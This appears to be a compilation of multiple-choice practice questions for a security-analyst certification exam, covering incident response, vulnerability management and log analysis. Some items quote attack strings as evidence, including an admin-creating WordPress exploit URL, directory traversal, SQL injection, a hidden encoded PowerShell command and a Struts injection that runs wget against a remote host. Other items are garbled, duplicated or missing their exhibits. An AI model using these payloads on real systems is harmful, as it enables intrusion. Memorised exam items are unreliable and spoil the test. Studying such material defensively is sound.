Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of responsibility. These computers had critical sensitive information stored locally that needs to be recovered. The department manager advised all department employees to turn off their computers until the security team could be contacted about the issue. Which of the following is the first step the incident response staff members should take when they arrive?. Turn on all systems, scan for infection, and back up data to a USB storage device. Identify and remove the software installed on the impacted systems in the department. Explain that malware cannot truly be removed and then reimage the devices. Log on to the impacted systems with an administrator account that has privileges to perform. Segment the entire department from the network and review each computer offline.

Which of the following actions would an analyst most likely perform after an incident has been investigated?. Risk assessment. Root cause analysis. Incident response plan. Tabletop exercise.

An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet: /wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator Which of the following controls would work best to mitigate the attack represented by this snippet?. Limit user creation to administrators only. Limit layout creation to administrators only. Set the directory trx_addons to read only for all users. Set the directory v2 to read only for all users.

A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information: Which of the following vulnerabilities should be prioritized for remediation?. nessie.explosion. vote.4p. sweet.bike. great.skills.

A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?. Integrate an IT service delivery ticketing system to track remediation and closure. Create a compensating control item until the system can be fully patched. Accept the risk and decommission current assets as end of life. Request an exception and manually patch each system.

A team of analysts is developing a new internal system that correlates information from a variety of sources analyzes that information, and then triggers notifications according to company policy Whichof the following technologies was deployed?. SIEM. SOAR. IPS. CERT.

A security analyst received an alert regarding multiple successful MFA log-ins for a particular user When reviewing the authentication logs the analyst sees the following: Which of the following are most likely occurring, based on the MFA logs? (Select two). Dictionary attack. Push phishing. impossible geo-velocity. Subscriber identity module swapping. Rogue access point. Password spray.

An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large amount of data before being detected and blocked. A security analyst needs to complete a root cause analysis to determine how the attacker was able to gain access. Which of the following should the analyst perform first?. Document the incident and any findings related to the attack for future reference. Interview employees responsible for managing the affected systems. Review the log files that record all events related to client applications and user access. Identify the immediate actions that need to be taken to contain the incident and minimize damage.

A security analyst is responding to an indent that involves a malicious attack on a network. Data closet. Which of the following best explains how are analyst should properly document the incident?. Back up the configuration file for alt network devices. Record and validate each connection. Create a full diagram of the network infrastructure. Take photos of the impacted items.

While reviewing the web server logs a security analyst notices the following snippet ..\../..\../boot.ini Which of the following is being attempted?. Directory traversal. Remote file inclusion. Cross-site scripting. Remote code execution. Enumeration of/etc/pasawd.

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment Which of the following must be considered to ensure the consultant does no harm to operations?. Employing Nmap Scripting Engine scanning techniques. Preserving the state of PLC ladder logic prior to scanning. Using passive instead of active vulnerability scans. Running scans during off-peak manufacturing hours.

A cybersecurity analyst is recording the following details * ID * Name * Description * Classification of information * Responsible party In which of the following documents is the analyst recording this information?. Risk register. Change control documentation. Incident response playbook. Incident response plan.

A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment. In collecting scheduled tasks from all enterprise workstations, the following host details are aggregated: Which of the following actions should the hunter perform first based on the details above?. Acquire a copy of taskhw.exe from the impacted host. Scan the enterprise to identify other systems with taskhw.exe present. Perform a public search for malware reports on taskhw.exe. Change the account that runs the -caskhw. exe scheduled task.

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender Which of the following information security goals is the analyst most likely trying to achieve?. Non-repudiation. Authentication. Authorization. Integrity.

Exploit code for a recently disclosed critical software vulnerability was publicly available (or download for several days before being removed. Which of the following CVSS v.3.1 temporal metrics was most impacted by this exposure?. Remediation level. Exploit code maturity. Report confidence. Availability.

When undertaking a cloud migration of multiple SaaS application, an organizations system administrator struggled … identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?. CASB. SASE. ZTNA. SWG.

A Chief Information Security Officer wants to implement security by design, starting …… vulnerabilities, including SQL injection, FRI, XSS, etc. Which of the following would most likely meet the requirement?. Reverse engineering. Known environment testing. Dynamic application security testing. Code debugging.

Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades Which of the following is the best method to remediate the bugs?. Reschedule the upgrade and deploy the patch. Request an exception to exclude the patch from installation. Update the risk register and request a change to the SLA. Notify the incident response team and rerun the vulnerability scan.

Which of the following would likely be used to update a dashboard that integrates….. Webhooks. Extensible Markup Language. Threat feed combination. JavaScript Object Notation.

Which of the following would eliminate the need for different passwords for a variety or internal application?. CASB. SSO. PAM. MFA.

A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?. Offline storage. Evidence collection. Integrity validation. Legal hold.

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Select two). Performing dynamic application security testing. Reviewing the code. Fuzzing the application. Debugging the code. Implementing a coding standard. Implementing IDS.

During normal security monitoring activities, the following activity was observed: cd C:\Users\Documents\HR\Employees takeown/f .* SUCCESS: Which of the following best describes the potentially malicious activity observed?. Registry changes or anomalies. Data exfiltration. Unauthorized privileges. File configuration changes.

An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Select two). Ensure users the document system recovery plan prior to deployment. Perform a full system-level backup following the change. Leverage an audit tool to identify changes that are being made. Identify assets with dependence that could be impacted by the change. Require diagrams to be completed for all critical systems. Ensure that all assets are properly listed in the inventory management system.

An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS: 3.1/AV:N/AC: L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R Which of the following represents the exploit code maturity of this critical vulnerability?. E:U. S:C. RC:R. AV:N. AC:L.

An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?. Disable administrative accounts for any operations. Implement MFA requirements for all internal resources. Harden systems by disabling or removing unnecessary services. Implement controls to block execution of untrusted applications.

A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web interface: Which of the following exploits is most likely being attempted?. SQL injection. Local file inclusion. Cross-site scripting. Directory traversal.

An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Which of the following processes most likely can be performed to understand the purpose of the binary file?. File debugging. Traffic analysis. Reverse engineering. Machine isolation.

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested?. Uncredentialed scan. Discoyery scan. Vulnerability scan. Credentialed scan.

Which of the following stakeholders are most likely to receive a vulnerability scan report? (Select two). Executive management. Law enforcement. Marketing. Legal. Product owner. Systems admininstration.

A security analyst reviews the following extract of a vulnerability scan that was performed against the web server: Which of the following recommendations should the security analyst provide to harden the web server?. Remove the version information on http-server-header. Disable tcp_wrappers. Delete the /wp-login.php folder. Close port 22.

A security administrator needs to import Pll data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?. Data masking. Hashing. Watermarking. Encoding.

A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?. Instruct the firewall engineer that a rule needs to be added to block this external server. Escalate the event to an incident and notify the SOC manager of the activity. Notify the incident response team that a DDoS attack is occurring. Identify the IP/hostname for the requests and look at the related activity.

A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Which of the following should the analyst utilize to best accomplish this goal?. SMB share. API endpoint. SMTP notification. SNMP trap.

A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?. A local red team member is enumerating the local RFC1918 segment to enumerate hosts. A threat actor has a foothold on the network and is sending out control beacons. An administrator executed a new database replication process without notifying the SOC. An insider threat actor is running Responder on the local segment, creating traffic replication.

Which of the following threat actors is most likely to target a company due to its questionable environmental policies?. Hacktivist. Organized crime. Nation-state. Lone wolf.

An organization's email account was compromised by a bad actor. Given the following Information: Which of the following is the length of time the team took to detect the threat?. 25 minutes. 40 minutes. 45 minutes. 2 hours.

A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?. XDR logs. Firewall logs. IDS logs. MFA logs.

During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to overall risk associated with this vulnerability?. The risk would not change because network firewalls are in use. The risk would decrease because RDP is blocked by the firewall. The risk would decrease because a web application firewall is in place. The risk would increase because the host is external facing.

Which of the following is a commonly used four-component framework to communicate threat actor behavior?. STRIDE. Diamond Model of Intrusion Analysis. Cyber Kill Chain. MITRE ATT&CK.

An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?. Identify and discuss the lessons learned with the prior analyst. Accept all findings and continue to investigate the next item target. Review the steps that the previous analyst followed. Validate the root cause from the prior analyst.

A company has decided to expose several systems to the internet, The systems are currently available internally only. A security analyst is using a subset of CVSS3.1 exploitability metrics to prioritize the vulnerabilities that would be the most exploitable when the systems are exposed to the internet. The systems and the vulnerabilities are shown below: Which of the following systems should be prioritized for patching?. brown. grey. blane. sullivan.

An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?. DLP. NAC. EDR. NIDS.

A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?. Service-level agreement. Change management plan. Incident response plan. Memorandum of understanding.

Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization's endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor's actions?. Delivery. Reconnaissance. Exploitation. Weaponizatign.

A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an idle process of at least 70%. Which of the following best describes how the security analyst can effectively review the malware without compromising the organization's network?. Utilize an RDP session on an unused workstation to evaluate the malware. Disconnect and utilize an existing infected asset off the network. Create a virtual host for testing on the security analyst workstation. Subscribe to an online service to create a sandbox environment.

The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of alerts that require remediation by an analyst has tripled. Which of the following should the organization utilize to best centralize the workload for the internal security team? (Select two). SOAR. SIEM. MISP. NGFW. XDR. DLP.

Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes does this describe?. Business continuity plan. Lessons learned. Forensic analysis. Incident response plan.

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?. DKIM. SPF. SMTP. DMARC.

The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities were reviewed for malicious or anomalous connections, data uploads/downloads, and exploits. A review of the controls confirmed multifactor authentication was enabled. Which of the following should be done first to mitigate impact to the business networks and assets?. Perform a forced password reset. Communicate the compromised credentials to the user. Perform an ad hoc AV scan on the user's laptop. Review and ensure privileges assigned to the user's account reflect least privilege. Lower the thresholds for SOC alerting of suspected malicious activity.

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?. Upload the binary to an air-gapped sandbox for analysis. Send the binaries to the antivirus vendor. Execute the binaries on an environment with internet connectivity. Query the file hashes using VirusTotal.

Which of the following is the most appropriate action a security analyst to take to effectively identify the most security risks associated with a locally hosted server?. Run the operating system update tool to apply patches that are missing. Contract an external penetration tester to attempt a brute-force attack. Download a vendor support agent to validate drivers that are installed. Execute a vulnerability scan against the target host.

Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting the organization?. To establish what information is allowed to be released by designated employees. To designate an external public relations firm to represent the organization. To ensure that all news media outlets are informed at the same time. To define how each employee will be contacted after an event occurs.

An employee is no longer able to log in to an account after updating a browser.The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?. RFI. LFI. CSRF. XSS.

An analyst investigated a website and produced the following: Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?. nmap -sS -T4 -F insecure.org. nmap -o insecure.org. nmap -sV -T4 -F insecure.org. nmap -A insecure.org.

A security analyst scans a host and generates the following output: Which of the following best describes the output?. The host is unresponsive to the ICMP request. The host Is running a vulnerable mall server. The host Is allowlng unsecured FTP connectlons. The host is vulnerable to web-based exploits.

A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following: Which of the following vulnerabilitles Is the securlty analyst trylng to valldate?. SQL injection. LFI. XSS. CSRF.

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?. Cross-reference the signature with open-source threat intelligence. Configure the EDR to perform a full scan. Transfer the malware to a sandbox environment. Log in to the affected systems and run necstat.

While reviewing the web server logs, a security analyst notices the following snippet: .. \ .. / .. \ .. /boot.ini Which of the following Is belng attempted?. Directory traversal. Remote file inclusion. Cross-site scripting. Remote code execution. Enumeration of /etc/passwd.

The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its dat a. Which of the following did the CISO most likely select?. PCI DSS. COBIT. ISO 27001. ITIL.

A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets. During the initial scan, users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not oocur during subsequent vulnerability scans?. Perform non-credentialed scans. Ignore embedded web server ports. Create a tailored scan for the printer subnet. Increase the threshold length of the scan timeout.

A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?. Cyber Threat Intelligence. Common Vulnerabilities and Exposures. Cyber Analytics Repository. ATT&CK.

An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violated?. KPI. SLO. SLA. MOU.

A high volume of failed RDP authentication attempts was logged on a critical server within a onehour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?. Enabling a user account lockout after a limited number of failed attempts. Installing a third-party remote access tool and disabling RDP on all devices. Implementing a firewall block for the remote system's IP address. Increasing the verbosity of log-on event auditing on all devices.

An analyst is investigating a phishing incident and has retrieved the following as part of the investigation: cmd.exe /c c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden - ExecutionPolicy Bypass -NoLogo -NoProfile -EncodedCommand <VERY LONG STRING> Which of the following should the analyst use to gather more information about the purpose of this command?. Echo the command payload content into 'base64 -d'. Execute the command from a Windows VM. Use a command console with administrator privileges to execute the code. Run the command as an unprivileged user from the analyst workstation.

The security team at a company, which was a recent target of ransomware, compiled a list of hosts that were identified as impacted and in scope for this incident. Based on the following host list: Which of the following systems was most pivotal to the threat actor in its distribution of the encryption binary via Group Policy?. SQL01. WK10-Sales07. WK7-Plant01. DCEast01. HQAdmin9.

Several reports with sensitive information are being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?. Implement step-up authentication for administrators. Improve employee training and awareness. Increase password complexity standards. Deploy mobile device management.

Which of the following best describes the key goal of the containment stage of an incident response process?. To limit further damage from occurring. To get services back up and running. To communicate goals and objectives of the incident response plan. To prevent data follow-on actions by adversary exfiltration.

During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the most likely cause of this issue?. Legacy system. Business process interruption. Degrading functionality. Configuration management.

An analyst investigated a website and produced the following: Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 10:21 CDT Nmap scan report for insecure.org (45.33.49.119) Host is up (0.054s latency). rDNS record for 45.33.49.119: ack.nmap.org Not shown: 95 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 25/tcp closed smtp 80/tcp open http Apache httpd 2.4.6 113/tcp closed ident 443/tcp open ssl/http Apache httpd 2.4.6 Service Info: Host: issues.nmap.org Service detection performed. Please report any incorrect results at https://nmap .org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.52 seconds Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?. nmap -sS -T4 -F insecure.org. nmap -0 insecure.org. nmap -sV -T4 -F insecure.org. nmap -A insecure.org.

An MSSP received several alerts from customer 1,which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violated?. KPI. SLO. SLA. MOU.

Results of a SOC customer service evaluation indicate high levels of dissatisfaction with the inconsistent services provided after regular work hours. To address this, the SOC lead drafts a document establishing customer expectations regarding the SOC's performance and quality of services. Which of the following documents most likely fits this description?. Risk management plan. Vendor agreement. Incident response plan. Service-level agreement.

A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Which of the following best describes what the analyst will be creating?. Bots. IoCs. TTPs. Signatures.

A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?. Has heat. OpenVAS. OWASP ZAP. Nmap.

An organization has a critical financial application hosted online that does not allow event logging to send to the corporate SIEM. Which of the following is the best option for the security analyst to configure to improve the efficiency of security operations?. Configure a new SIEM specific to the management of the hosted environment. Subscribe to a threat feed related to the vendor's application. Use a vendor-provided API to automate pulling the logs in real time. Download and manually import the logs outside of business hours.

Which of the following will most likely cause severe issues with authentication and logging?. Virtualization. Multifactor authentication. Federation. Time synchronization.

A list of loCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost. exe. Which of the following best describes the result if security teams add this indicator to their detection signatures?. This indicator would fire on the majority of Windows devices. Malicious files with a matching hash would be detected. Security teams would detect rogue svchost. exe processes in their environment. Security teams would detect event entries detailing executionof known-malicious svchost. exe processes.

The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?. PCI DSS. COBIT. ISO 27001. ITIL.

A SOC analyst determined that a significant number of the reported alarms could be closed after removing the duplicates. Which of the following could help the analyst reduce the number of alarms with the least effort?. SOAR. API. XDR. REST.

A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ensure the application will be able to handle unexpected strings with anomalous formats without crashing. Which of the following processes is the most applicable for testing the application to find how it would behave in such a situation?. Fuzzing. Coding review. Debugging. Static analysis.

ver. ver. ver. ver. ver.

ver. ver.

A regulated organization experienced a security breach that exposed a list of customer names with corresponding PH data. Which of the following is the best reason for developing the organization's communication plans?. For the organization's public relations department to have a standard notification. To ensure incidents are immediately reported to a regulatory agency. To automate the notification to customers who were impacted by the breach. To have approval from executive leadership on when communication should occur.

An incident response team member is triaging a Linux server. The output is shown below: $ cat /etc/passwd root:x:0:0::/:/bin/zsh bin:x:1:1::/:/usr/bin/nologin daemon:x:2:2::/:/usr/bin/nologin mail:x:8:12::/var/spool/mail:/usr/bin/nologin http:x:33:33::/srv/http:/bin/bash nobody:x:65534:65534:Nobody:/:/usr/bin/nologin git:x:972:972:git daemon user:/:/usr/bin/git-shell $ cat /var/log/httpd at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami) at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init>(FileUpl oadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartReq uest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartReq uest.java:423) Which of the following is the adversary most likely trying to do?. Create a backdoor root account named zsh. Execute commands through an unsecured service account. Send a beacon to a command-and-control server. Perform a denial-of-service attack on the web server.

Which of the following explains the importance of a timeline when providing an incident response report?. The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis. An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk. The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken. An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.

An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the first step for the security team to take to ensure compliance with the request?. Publicly disclose the request to other vendors. Notify the departments involved to preserve potentially relevant information. Establish a chain of custody, starting with the attorney's request. Back up the mailboxes on the server and provide the attorney with a copy.

ver. ver. ver.

ver. ver. ver. ver.

A security administrator has found indications of dictionary attacks against the company's externalfacing portal. Which of the following should be implemented to best mitigate the password attacks?. Multifactor authentication. Password complexity. Web application firewall. Lockout policy.

Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development team?. Increases the product price by using the implementation as a piece of marketing. Decreases the risks of the software usage and complies with regulatory requirements. Improves the agile process and decreases the amount of tests before the final deployment. Transfers the responsibility for security flaws to the vulnerability management team.

Which of the following is the best reason to implement an MOU?. To create a business process for configuration management. To allow internal departments to understand security responsibilities. To allow an expectation process to be defined for legacy systems. To ensure that all metrics on service levels are properly reported.

A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source review shows that the IP has a bad reputation. The perimeter firewall logs indicate the inbound traffic was allowed. The destination hosts are high-value assets with EDR agents installed. Which of the following is the best action for the SOC to take to protect against any further activity from the source IP?. Add the IP address to the EDR deny list. Create a SIEM signature to trigger on any activity from the source IP subnet detected by the web proxy or firewalls for immediate notification. Implement a prevention policy for the IP on the WAF. Activate the scan signatures for the IP on the NGFWs.

A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following should the SOC manager utilize to improve the process?. The most recent audit report. The incident response playbook. The incident response plan. The lessons-learned register.

K company has recently experienced a security breach via a public-facing service. Analysis of the event on the server was traced back to the following piece of code: SELECT ’ From userjdata WHERE Username = 0 and userid8 1 or 1=1;— Which of the following controls would be best to implement?. Deploy a wireless application protocol. Remove the end-of-life component. Implement proper access control. Validate user input.

A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the following actions should a SOC analyst take first after receiving the report?. Implement a vulnerability scan to determine whether the environment is at risk. Block the IP addresses and domains from the report in the web proxy and firewalls. Verify whether the information is relevant to the organization. Analyze the web application logs to identify any suspicious or malicious activity.

A systems administrator is reviewing after-hours traffic flows from data center servers and sees regular, outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?. Command-and-control beaconing activity. Data exfiltration. Anomalous activity on unexpected ports. Network host IP address scanning. A rogue network device.

A web application has a function to retrieve content from an internal URL to identify CSRF attacks in the logs. The security analyst is building a regular expression that will filter out the correctly formatted requests. The target URL is https://10.1.2.3/api, and the receiving API only accepts GET requests and uses a single integer argument named "id." Which of the following regular expressions should the analyst use to achieve the objective?. (?!https://10\.1\.2\.3/api\?id=[0-9]+). "https://10\.1\.2\.3/api\?id=\d+. (?:"https://10\.1\.2\.3/api\?id-[0-9]+). https://10\.1\.2\.3/api\?id«[0-9J$.

Which of the following best explains the importance of network microsegmentation as part of a Zero Trust architecture?. To allow policies that are easy to manage and less granular. To increase the costs associated with regulatory compliance. To limit how far an attack can spread. To reduce hardware costs with the use of virtual appliances.

A company's internet-facing web application has been compromised several times due to identified design flaws. The company would like to minimize the risk of these incidents from reoccurring and has provided the developers with better security training. However, the company cannot allocate any more internal resources to the issue. Which of the following are the best options to help identify flaws within the system? (Select two). Deploying a WAF. Performing a forensic analysis. Contracting a penetration test. Holding a tabletop exercise. Creating a bug bounty program. Implementing threat modeling.

A network security analyst for a large company noticed unusual network activity on a critical system.Which of the following tools should the analyst use to analyze network traffic to search for malicious activity?. WAF. Wireshark. EDR. Nmap.

An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using?. MITRE ATT&CK. OSSTMM. Diamond Model of Intrusion Analysis. OWASP.

A Chief Information Security Officer wants to lock down the users' ability to change applications that are installed on their Windows systems. Which of the following is the best enterprise-level solution?. HIPS. GPO. Registry. DLP.

A Chief Information Security Officer (CISO) has determined through lessons learned and an associated after-action report that staff members who use legacy applications do not adequately understand how to differentiate between non-malicious emails and phishing emails. Which of the following should the CISO include in an action plan to remediate this issue?. Awareness training and education. Replacement of legacy applications. Organizational governance. Multifactor authentication on all systems.

Which of the following is most appropriate to use with SOAR when the security team would like to automate actions across different vendor platforms?. STIX/TAXII. APIs. Data enrichment. Threat feed.

Which of the following responsibilities does the legal team have during an incident management event? (Select two). Coordinate additional or temporary staffing for recovery efforts. Review and approve new contracts acquired as a result of an event. Advise the Incident response team on matters related to regulatory reporting. Ensure all system security devices and procedures are in place. Conduct computer and network damage assessments for insurance. Verify that all security personnel have the appropriate clearances.

Executives at an organization email sensitive financial information to external business partners when negotiating valuable contracts. To ensure the legal validity of these messages, the cybersecurity team recommends a digital signature be added to emails sent by the executives. Which of the following are the primary goals of this recommendation? (Select two). Confidentiality. Integrity. Privacy. Anonymity. Non-repudiation. Authorization.

A company patches its servers using automation software. Remote SSH or RDP connections are allowed to the servers only from the service account used by the automation software. All servers are in an internal subnet without direct access to or from the internet. An analyst reviews the following vulnerability summary: 1. 2. 3. 4.

Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operating system events?. Registry editing. Network mapping. Timeline analysis. Write blocking.

A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following is the best way to relay the process information to the junior analyst?. Ask another team member to demonstrate their process. Email a link to a website that shows someone demonstrating a similar process. Let the junior analyst research and develop a process. Write a step-by-step document on the team wiki outlining the process.

An organization identifies a method to detect unexpected behavior, crashes, or resource leaks in a system by feeding invalid, unexpected, or random data to stress the application. Which of the following best describes this testing methodology?. Reverse engineering. Static. Fuzzing. Debugging.

Which of the following responsibilities does the legal team have during an incident management event? (Select two). Coordinate additional or temporary staffing for recovery efforts. Review and approve new contracts acquired as a result of an event. Advise the incident response team on matters related to regulatory reporting. Ensure all system security devices and procedures are in place. Conduct computer and network damage assessments for insurance. Verify that all security personnel have the appropriate clearances.

A systems administrator needs to gather security events with repeatable patterns from Linux log files. Which of the following would the administrator most likely use for this task?. A regular expression in Bash. Filters in the vi editor. Variables in a PowerShell script. A playbook in a SOAR tool.

An analyst is reviewing a dashboard from the company’s SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using?. MITRE ATT&CK. OSSTMM. Diamond Model of Intrusion Analysis. OWASP.

A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source review shows that the IP has a bad reputation. The perimeter firewall logs indicate the inbound traffic was allowed. The destination hosts are high-value assets with EDR agents installed. Which of the following is the best action for the SOC to take to protect against any further activity from the source IP?. Add the IP address to the EDR deny list. Create a SIEM signature to trigger on any activity from the source IP subnet detected by the web proxy or firewalls for immediate notification. Implement a prevention policy for the IP on the WAF. Activate the scan signatures for the IP on the NGFWs.

Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target’s information assets?. Structured Threat Information Expression. OWASP Testing Guide. Open Source Security Testing Methodology Manual. Diamond Model of Intrusion Analysis.

In the last hour, a high volume of failed RDP authentication attempts has been logged on a critical server. All of the authentication attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following mitigating controls would be most effective to reduce the rate of success of this brute-force attack? (Select two). Increase the granularity of log-on event auditing on all devices. Enable host firewall rules to block all outbound traffic to TCP port 3389. Configure user account lockout after a limited number of failed attempts. Implement a firewall block for the IP address of the remote system. Install a third-party remote access tool and disable RDP on all devices. Block inbound to TCP port 3389 from untrusted remote IP addresses at the perimeter firewall.

A SOC receives several alerts indicating user accounts are connecting to the company’s identity provider through non-secure communications. User credentials for accessing sensitive, businesscritical systems could be exposed. Which of the following logs should the SOC use when determining malicious intent?. DNS. tcpdump. Directory. IDS.

Which of the following characteristics ensures the security of an automated information system is the most effective and economical?. Originally designed to provide necessary security. Subjected to intense security testing. Customized to meet specific security threats. Optimized prior to the addition of security.

An XSS vulnerability was reported on one of the public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (Select two). Implement an IPS in front of the web server. Enable MFA on the website. Take the website offline until it is patched. Implement a compensating control in the source code. Configure TLS v1.3 on the website. Fix the vulnerability using a virtual patch at the WAF.

